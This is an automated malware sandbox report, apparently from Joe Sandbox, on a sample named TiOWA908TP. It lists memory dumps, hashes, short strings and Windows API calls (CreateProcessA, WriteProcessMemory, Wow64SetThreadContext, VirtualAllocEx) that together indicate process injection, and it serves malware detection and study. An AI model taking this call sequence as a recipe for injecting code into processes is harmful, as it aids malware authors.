                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 3dd644935ccc49f34ba9f10dd29dd59f78e33ebda5d5ab544ea534eefe4041a2
                                      • Instruction ID: a9f6ea8c540786a1e26a0f794890ebb9ca05fb65e031f995bd2bfc813a1b1a45
                                      • Opcode Fuzzy Hash: 3dd644935ccc49f34ba9f10dd29dd59f78e33ebda5d5ab544ea534eefe4041a2
                                      • Instruction Fuzzy Hash: 39813771D402899FDB10CFA9D8857EEBBF2BF48714F54812AE859E7240E7749885CF81

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2194 5565190-5565200 2196 5565202-556520c 2194->2196 2197 5565239-5565259 2194->2197 2196->2197 2198 556520e-5565210 2196->2198 2204 5565292-55652cc 2197->2204 2205 556525b-5565265 2197->2205 2199 5565212-556521c 2198->2199 2200 5565233-5565236 2198->2200 2202 5565220-556522f 2199->2202 2203 556521e 2199->2203 2200->2197 2202->2202 2206 5565231 2202->2206 2203->2202 2211 5565305-556537a CreateProcessA 2204->2211 2212 55652ce-55652d8 2204->2212 2205->2204 2207 5565267-5565269 2205->2207 2206->2200 2209 556528c-556528f 2207->2209 2210 556526b-5565275 2207->2210 2209->2204 2213 5565277 2210->2213 2214 5565279-5565288 2210->2214 2224 5565383-55653cb 2211->2224 2225 556537c-5565382 2211->2225 2212->2211 2216 55652da-55652dc 2212->2216 2213->2214 2214->2214 2215 556528a 2214->2215 2215->2209 2217 55652de-55652e8 2216->2217 2218 55652ff-5565302 2216->2218 2220 55652ec-55652fb 2217->2220 2221 55652ea 2217->2221 2218->2211 2220->2220 2223 55652fd 2220->2223 2221->2220 2223->2218 2230 55653cd-55653d1 2224->2230 2231 55653db-55653df 2224->2231 2225->2224 2230->2231 2232 55653d3 2230->2232 2233 55653e1-55653e5 2231->2233 2234 55653ef-55653f3 2231->2234 2232->2231 2233->2234 2237 55653e7 2233->2237 2235 55653f5-55653f9 2234->2235 2236 5565403 2234->2236 2235->2236 2238 55653fb 2235->2238 2239 5565404 2236->2239 2237->2234 2238->2236 2239->2239
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0556536A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: d354ce375cd03829b2a6061cd7279aa9cf5221cfbb316cb26f4e18482d8f652b
                                      • Instruction ID: 852516e0bcec60d7c2a5409e441bccf8f3d524fcbeda6b9f1f9f5079a6c1cc3a
                                      • Opcode Fuzzy Hash: d354ce375cd03829b2a6061cd7279aa9cf5221cfbb316cb26f4e18482d8f652b
                                      • Instruction Fuzzy Hash: 55814871D403899FDB10CFA9D8857EDBBF2BF48714F548129E859A7240E7749885CF81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835891558.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_63e0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: d
                                      • API String ID: 0-2564639436
                                      • Opcode ID: 499d7a168ee029e456dee4ac624201ce0756f215408dd745829c86577c63df2e
                                      • Instruction ID: 31985516cedb8381516cb3868500eb7b6138cef5df23c17f9e2b8add3c8e9912
                                      • Opcode Fuzzy Hash: 499d7a168ee029e456dee4ac624201ce0756f215408dd745829c86577c63df2e
                                      • Instruction Fuzzy Hash: 62D16A346006168FDB64CF28C48496AB7F6FF89310B15C96DD45A9B7A1DB30FC46CBA4
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05567CA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: d1b63737a5fd9fff0c50341bdb4fe5163b7b894d83f38b8a0c612c76aee01f08
                                      • Instruction ID: 980411c6b22cd548aaaa87c535f4f3331155da8d48440885ed941072ee4e9d1c
                                      • Opcode Fuzzy Hash: d1b63737a5fd9fff0c50341bdb4fe5163b7b894d83f38b8a0c612c76aee01f08
                                      • Instruction Fuzzy Hash: 5A215AB5D003499FDB10CFA9C8847DEBBF5FF48314F14842AE919A7240D7799944CBA4
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05567CA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 6c5470b06f80287a2279751806551b9f7058c6faed3fea60e0d20acb4d6f4a23
                                      • Instruction ID: 3dbfbed5e9a04273648db79092fc04e94ced7f9d92f25624cdb538b16927a9c1
                                      • Opcode Fuzzy Hash: 6c5470b06f80287a2279751806551b9f7058c6faed3fea60e0d20acb4d6f4a23
                                      • Instruction Fuzzy Hash: 5B2139B5D103499FDB10CFAAC884BEEBBF5FF48314F14842AE919A7240D7789944DBA4
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05567086
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 91c237baed5f0dc95edf3fcd87b155ea05b7618b36df1e3126908b2a1b527905
                                      • Instruction ID: d4660f2c4dc777da1cea92090322404cdcb2fd8247e6ed77af22991cb4decc11
                                      • Opcode Fuzzy Hash: 91c237baed5f0dc95edf3fcd87b155ea05b7618b36df1e3126908b2a1b527905
                                      • Instruction Fuzzy Hash: F7213775D003498FDB10DFAAC8847EEBBF4FF48224F54842AD459A7240DB78A945CFA5
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05567086
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: d706189ce0d73d28b8bd7dc8065f725847ae97e995f2469473c6ffc28f5dc78a
                                      • Instruction ID: 439932cd7cb530ea75f4c5c0a52eaba88e978ff0c772e9eec577865aba4a5061
                                      • Opcode Fuzzy Hash: d706189ce0d73d28b8bd7dc8065f725847ae97e995f2469473c6ffc28f5dc78a
                                      • Instruction Fuzzy Hash: BA213571D003498FDB10DFAAC8847EEBBF4FF88224F14842AD459A7240CB78A945CFA5
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 062809F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4834668382.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6280000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 40e11b5bf3ca8310c008f041d4a7ce9015f39ba08f93672788cb1c0c926ba823
                                      • Instruction ID: db9bc5a9860801f39416b64118fefced027be3d29f3c6a6e2b46d2d4d68e48c3
                                      • Opcode Fuzzy Hash: 40e11b5bf3ca8310c008f041d4a7ce9015f39ba08f93672788cb1c0c926ba823
                                      • Instruction Fuzzy Hash: D52134B5D003888FDB10DFAAC884BEEFBF5AF58214F14842AD469A3240C7799945CFA1
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 062809F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4834668382.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6280000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: e8b1c342f58ddc92ca92d3e0551ccf012ae58f0bd9bd52aab035bd534558f066
                                      • Instruction ID: 69d9634c4ece8a75e821d8713a80a269dc51a9c9c3d4b5ade22d68575ef5658d
                                      • Opcode Fuzzy Hash: e8b1c342f58ddc92ca92d3e0551ccf012ae58f0bd9bd52aab035bd534558f066
                                      • Instruction Fuzzy Hash: AC1124B1D003499FDB10DFAAC884BEFFBF4AF48210F14842AD419A7240C779A945CFA5
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05567A16
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4832228120.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5560000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: b59c73a8297a9f4844fd3e35bb61af89eef80ec0155c1c00cd5fe3d7ebbffb0d
                                      • Instruction ID: 7c9fadf32d35f133581042af1995ded63c507f6db82e6e3d79e4df91b9f523b5
                                      • Opcode Fuzzy Hash: b59c73a8297a9f4844fd3e35bb61af89eef80ec0155c1c00cd5fe3d7ebbffb0d
                                      • Instruction Fuzzy Hash: 96112675D003499FDB20DFAAC8447EFBBF5EB88324F14881AD419A7240C775A944DFA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835891558.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_63e0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: cc4fba5adda312b4f73e84643b8b4a81a32e38a56328cfff399e603c16341477
                                      • Instruction ID: 2cf10bf7ddcc6cc96108a57ca31e3ee2f1207a3dce76a74713dea26165d92a06
                                      • Opcode Fuzzy Hash: cc4fba5adda312b4f73e84643b8b4a81a32e38a56328cfff399e603c16341477
                                      • Instruction Fuzzy Hash: C3C19F74A052698FDBA4DF68D884BDDB7B2FB49300F1080EAD549A7384D7B46E84CF94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836050274.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6550000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: eac314968787038b9c4f9caaa6c4b62ff369d57c351d14f0c75f15bd4b742425
                                      • Instruction ID: 6b959dd6f9f2a4e614d9a38f20e162dacac635e5c1865a0f8fb5e2cd148edfed
                                      • Opcode Fuzzy Hash: eac314968787038b9c4f9caaa6c4b62ff369d57c351d14f0c75f15bd4b742425
                                      • Instruction Fuzzy Hash: 94A1ED34A10519DFCB54EFA4D8A8A9DBBB2FF89300F518559E9056B3A1DB70EC46CF80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836050274.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6550000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: d0cfa43b044755cee0e349106ad5b1e0905057b254ba1daf527055cffe695dee
                                      • Instruction ID: 7a65ff4bebf2e21e07b594745b9525ea87683fb382125882a7ac40b6532da118
                                      • Opcode Fuzzy Hash: d0cfa43b044755cee0e349106ad5b1e0905057b254ba1daf527055cffe695dee
                                      • Instruction Fuzzy Hash: 93712B35B002149FDB94DF64D868BAEB7B2BBC8700F118059E906AB395DE75EC428B90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835891558.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_63e0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !
                                      • API String ID: 0-2657877971
                                      • Opcode ID: 32f92e369fd585a925d6d3d7bb83e9c76262854e92c57e01e3826b7bedf601c4
                                      • Instruction ID: ba221efdf7c2a33a3c79b7e81320979a5fa95cc976c037f9ff4c872e16086665
                                      • Opcode Fuzzy Hash: 32f92e369fd585a925d6d3d7bb83e9c76262854e92c57e01e3826b7bedf601c4
                                      • Instruction Fuzzy Hash: 8981D374A04228CFDB60CFA8D888BDDBBF5FB89300F10815AD915AB395C3759844CFA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836050274.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6550000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: f866b8a43b8718b9e233f97305a53e12a3b601eec783146428f2a7f0e1799b31
                                      • Instruction ID: 98b9c116360228dea0b435b6a690207c2e1b27bb8279164ff218ac37a83164cc
                                      • Opcode Fuzzy Hash: f866b8a43b8718b9e233f97305a53e12a3b601eec783146428f2a7f0e1799b31
                                      • Instruction Fuzzy Hash: 47418630B106158FCB95AF64C8A8A6E77B7FFC9700F51441AD903A7394DF709C468B91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835891558.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_63e0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: t[#)
                                      • API String ID: 0-1508624011
                                      • Opcode ID: d29f8f2a7e3a42ad317aba456732728f8eae7fbc8819712dd1cee701cc20ffd9
                                      • Instruction ID: ef54d53c3703d6d7b2f45ba1eab6e396cb3ddefa21637da042567856ef9d437a
                                      • Opcode Fuzzy Hash: d29f8f2a7e3a42ad317aba456732728f8eae7fbc8819712dd1cee701cc20ffd9
                                      • Instruction Fuzzy Hash: 10513F74901219CFEBA5DF69DD54BA9B7B2BB88200F1081A9D40EE7394CB749D81CF50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836050274.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6550000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: a93c2c1638079bf23ec52ff533861c79febd19b7611ba13ebbaafd6e3cb6a0c4
                                      • Instruction ID: 5abbb6e04fc0340f52bf9865433e7b90f6b71c6d33858f25f110ca65c3ff563b
                                      • Opcode Fuzzy Hash: a93c2c1638079bf23ec52ff533861c79febd19b7611ba13ebbaafd6e3cb6a0c4
                                      • Instruction Fuzzy Hash: 80415B357006009FD7589B65D868B2B77EABFC8700F114069E64A8B3A1DE71EC43CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835891558.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_63e0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: t[#)
                                      • API String ID: 0-1508624011
                                      • Opcode ID: d41a188567fca5901d65e2a031245099655bae207bb4767df8717501e3376cf4
                                      • Instruction ID: b72f38e9c03267fcc2248eff3f3c20d773d63dd512caea131af02fe53ed98086
                                      • Opcode Fuzzy Hash: d41a188567fca5901d65e2a031245099655bae207bb4767df8717501e3376cf4
                                      • Instruction Fuzzy Hash: 02411074A01218CFEBA4DF69DD94BA9B7B6BB88200F1482E9D50DE7394CB749D81CF50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836050274.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6550000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: dbfafb291d4375fb85236d7d21055dd9ad4c2f3e4e319612814ea04a91d86e25
                                      • Instruction ID: 9f28824badc4aff671c5ecf61be2508bffef77f69f344c6f902f24cd3f09c5e1
                                      • Opcode Fuzzy Hash: dbfafb291d4375fb85236d7d21055dd9ad4c2f3e4e319612814ea04a91d86e25
                                      • Instruction Fuzzy Hash: D2314B317406009FD358DB69D868B2A77EABFC8704F114069E64A8B3A1DE71EC03CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836050274.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6550000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: f210d61f5d150fbd1e2c82ff643248723db8f5541ab092558e6f6ef49ccf4e76
                                      • Instruction ID: 3cea603de28a85318d456293dc0585c235eb081177eb7ebe4369df51430b6f3b
                                      • Opcode Fuzzy Hash: f210d61f5d150fbd1e2c82ff643248723db8f5541ab092558e6f6ef49ccf4e76
                                      • Instruction Fuzzy Hash: 13319535600204AFCF999F64D85899ABBB7FF89310F155069EA065B3A1CA31EC56CF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836521353.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6630000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "
                                      • API String ID: 0-123907689
                                      • Opcode ID: be69a5de755164dcec06bafe448f8c0a0b2f5e6f909fa7c3b0dd3b6dd7784210
                                      • Instruction ID: 824704a15997e739606d3ed599c081800306abc4fd937e04325374048ae38f73
                                      • Opcode Fuzzy Hash: be69a5de755164dcec06bafe448f8c0a0b2f5e6f909fa7c3b0dd3b6dd7784210
                                      • Instruction Fuzzy Hash: D0412974A052288FEB60DF24C954BD9B7B6FF89300F0090EAD549A7381DB746A85CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836579197.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6660000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Teq
                                      • API String ID: 0-1098410595
                                      • Opcode ID: 7547ce0f0f7bc32620a0a53d7ace29b8ea1570d556aa576d28b864ac41e9ef69
                                      • Instruction ID: f4fffe46fc5e003c85228c0ce8c2c0a1ddc75f962704ddd418410162b035c3bb
                                      • Opcode Fuzzy Hash: 7547ce0f0f7bc32620a0a53d7ace29b8ea1570d556aa576d28b864ac41e9ef69
                                      • Instruction Fuzzy Hash: 1841C474A402198FDB64DF24E998BEDB7B2FB88300F1080A9D54AA7784DB745EC5CF54
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835088734.00000000062D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_62d0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: p<q
                                      • API String ID: 0-3896934649
                                      • Opcode ID: 1d3e877da30bf4be5dc08f040091bee400a3b962e5c3c2e8901e00382fd3ac11
                                      • Instruction ID: 6812aae0f4068edf7b9d8a6c32853d359acd266dbeba67a136206c1dff2f2899
                                      • Opcode Fuzzy Hash: 1d3e877da30bf4be5dc08f040091bee400a3b962e5c3c2e8901e00382fd3ac11
                                      • Instruction Fuzzy Hash: 502149713001999FDB55CF2AC854AAA7BEAEF89300F0940A5FD55CB3A1DA35DC51CB60
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 062819D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4834668382.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6280000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: affeecd3acc4e7c0c2e99296889adcc8d9be7424c114360a04b4cd958fd7ab30
                                      • Instruction ID: b10b0a4688332b91538dd8bbbc6db1bfacee96ef7afc2fe2585530677f076ebc
                                      • Opcode Fuzzy Hash: affeecd3acc4e7c0c2e99296889adcc8d9be7424c114360a04b4cd958fd7ab30
                                      • Instruction Fuzzy Hash: 1E113AB6D003499FDB20DFAAC8447EEBBF5AF88324F14881AD455A7240C775A945CF94
                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,?,?), ref: 062819D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4834668382.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6280000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: a61a8f85d0f3e9808405a7e51d80ca744b490a88a82bdfcdad6986a1426bf996
                                      • Instruction ID: 2edb374281300944602ef8bbf24cded4b1fdb63bbc46e0a642b4312096a04093
                                      • Opcode Fuzzy Hash: a61a8f85d0f3e9808405a7e51d80ca744b490a88a82bdfcdad6986a1426bf996
                                      • Instruction Fuzzy Hash: D1113775D003499FDB10DFAAC8447EFBBF5AB88324F14881AD459A7240C775A945CFA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835891558.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_63e0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,
                                      • API String ID: 0-3772416878
                                      • Opcode ID: b4f647afafb890efc1e3e1f3fe14d71bdf46c711151746df9a619a6ce0d4aec3
                                      • Instruction ID: a922aad5cceff68914e7aabbbaf9b1537fa8e2e16eb89d96615b38a44aa4b813
                                      • Opcode Fuzzy Hash: b4f647afafb890efc1e3e1f3fe14d71bdf46c711151746df9a619a6ce0d4aec3
                                      • Instruction Fuzzy Hash: F121BFB4E14229DFDB50CF58E498B9DBBF1FB49310F008495E809A7291C7349981CFA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836521353.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6630000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: D
                                      • API String ID: 0-2746444292
                                      • Opcode ID: b707e3c7cdd73de4180261f928e16c6c343f8f81cfa61bc292704dc0923de1f3
                                      • Instruction ID: fdb2f1690d10059c97ac6b2f6c32a9e8c41fe9273d767be065b47470ceb964cc
                                      • Opcode Fuzzy Hash: b707e3c7cdd73de4180261f928e16c6c343f8f81cfa61bc292704dc0923de1f3
                                      • Instruction Fuzzy Hash: BC11C274A452299FEBA9DF14CDA4BDABBB6FB88300F1040D9D509A7394CB315E81CF45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836521353.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6630000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: D
                                      • API String ID: 0-2746444292
                                      • Opcode ID: e98d9c1e9660b8b88695e6806253dc1d05c3ee4b38497cefb63cabdddeafe735
                                      • Instruction ID: c12cf71661c95defc5b75d68eb5022f0d587769ff428c2251ec476f31efdd508
                                      • Opcode Fuzzy Hash: e98d9c1e9660b8b88695e6806253dc1d05c3ee4b38497cefb63cabdddeafe735
                                      • Instruction Fuzzy Hash: 6101D374A052289FDBA5DF14C894BDABBB6FB88300F1080D9E50DA7380CB345E81CF44
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4815159663.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_25a0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J
                                      • API String ID: 0-1141589763
                                      • Opcode ID: b23848ad0596638553c4d3be08ed9aaedd2d63df9d26626d20529473307609df
                                      • Instruction ID: 70104a1b620080fa23a9d374ee600f6dd2a1a64ab3a7fe6ab8b13e8fa6ee2c10
                                      • Opcode Fuzzy Hash: b23848ad0596638553c4d3be08ed9aaedd2d63df9d26626d20529473307609df
                                      • Instruction Fuzzy Hash: 410166B4D402A8CFCB64DF24D8997ADBBB2BB48305F0048DAD50AB3244DB741AC5DF09
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835088734.00000000062D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_62d0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 1
                                      • API String ID: 0-2212294583
                                      • Opcode ID: b9e22079622208aeca25d3f50da525aa8f5dcb249289a4c3741b29c1cdfa873f
                                      • Instruction ID: 3e1b2abe5723833ff6c1862f7fcab2bae1ebbf6c8586eb2da9f35940eae266f1
                                      • Opcode Fuzzy Hash: b9e22079622208aeca25d3f50da525aa8f5dcb249289a4c3741b29c1cdfa873f
                                      • Instruction Fuzzy Hash: 44F07470D24229CFDB91DFA8E888B9CBBF5BF05304F1445A6D845A7291D7B05985CF05
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836521353.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6630000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: >
                                      • API String ID: 0-325317158
                                      • Opcode ID: 280d67d1968ef3fe43653b4b08ebf221e089944ff9fdfdd31eb291b85c4b594a
                                      • Instruction ID: 82c6f2cbc478866d00a0a45da950780b17bfa300bbcbde9146968fab378b509c
                                      • Opcode Fuzzy Hash: 280d67d1968ef3fe43653b4b08ebf221e089944ff9fdfdd31eb291b85c4b594a
                                      • Instruction Fuzzy Hash: 93F0F8389061298FDB54DF20C988BE9BBB1EF84304F0080DA940967280CB359F82CF81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4835088734.00000000062D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_62d0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: T
                                      • API String ID: 0-3187964512
                                      • Opcode ID: d06de2274c204d345e779c33391f6926569affe0079bc0d4eda3f04691944bca
                                      • Instruction ID: ffaac8acee67750aeb284f426b0f0f832c02c300af0e434092db61f46e865974
                                      • Opcode Fuzzy Hash: d06de2274c204d345e779c33391f6926569affe0079bc0d4eda3f04691944bca
                                      • Instruction Fuzzy Hash: 66E0E2349242288FCB61CF20C840A9EBBB6AB06304F1081D9988872240C7B14E81CF80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4836521353.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6630000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
